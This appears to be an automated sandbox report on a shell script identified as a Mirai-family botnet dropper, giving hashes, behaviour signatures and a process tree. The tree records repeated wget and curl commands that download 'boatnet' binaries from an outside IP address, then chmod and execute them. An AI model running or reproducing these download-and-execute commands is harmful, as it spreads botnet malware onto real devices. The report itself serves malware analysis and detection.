Analysis

  • max time kernel
    59s
  • max time network
    61s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
10/10

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Executes dropped EXE 5 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 1 TTPs 10 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:1570
    • /usr/bin/wget
      wget http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1571
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1582
    • /usr/bin/cat
      cat boatnet.x86
      2⤵
        PID:1583
      • /usr/bin/chmod
        chmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t
        2⤵
          PID:1584
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1585
        • /usr/bin/wget
          wget http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Writes file to tmp directory
          PID:1589
        • /usr/bin/curl
          curl -O http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Writes file to tmp directory
          PID:1591
        • /usr/bin/chmod
          chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t
          2⤵
            PID:1593
          • /tmp/WTF
            ./WTF
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Writes file to system bin folder
            • Reads runtime system information
            PID:1594
          • /usr/bin/wget
            wget http://94.156.71.225/hiddenbin/boatnet.arc
            2⤵
            • Writes file to tmp directory
            PID:1598
          • /usr/bin/curl
            curl -O http://94.156.71.225/hiddenbin/boatnet.arc
            2⤵
            • Writes file to tmp directory
            PID:1600
          • /usr/bin/chmod
            chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t
            2⤵
              PID:1603
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Writes file to system bin folder
              • Reads runtime system information
              PID:1604
            • /usr/bin/wget
              wget http://94.156.71.225/hiddenbin/boatnet.i468
              2⤵
                PID:1608
              • /usr/bin/curl
                curl -O http://94.156.71.225/hiddenbin/boatnet.i468
                2⤵
                • Writes file to tmp directory
                PID:1610
              • /usr/bin/chmod
                chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t
                2⤵
                  PID:1612
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Writes file to system bin folder
                  • Reads runtime system information
                  PID:1613
                • /usr/bin/wget
                  wget http://94.156.71.225/hiddenbin/boatnet.i686
                  2⤵
                    PID:1617
                  • /usr/bin/curl
                    curl -O http://94.156.71.225/hiddenbin/boatnet.i686
                    2⤵
                    • Writes file to tmp directory
                    PID:1619
                  • /usr/bin/chmod
                    chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t
                    2⤵
                      PID:1621
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      • Modifies Watchdog functionality
                      • Writes file to system bin folder
                      • Reads runtime system information
                      PID:1622
                    • /usr/bin/wget
                      wget http://94.156.71.225/hiddenbin/boatnet.x86_64
                      2⤵
                      • Writes file to tmp directory
                      PID:1626

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/boatnet.x86

                    Filesize

                    36KB

                    MD5

                    ba2cb5b8715ba94c39e24e75a34d0ea0

                    SHA1

                    7182bf3b0e14e5224e741c15174c6e93f00df444

                    SHA256

                    01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

                    SHA512

                    0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d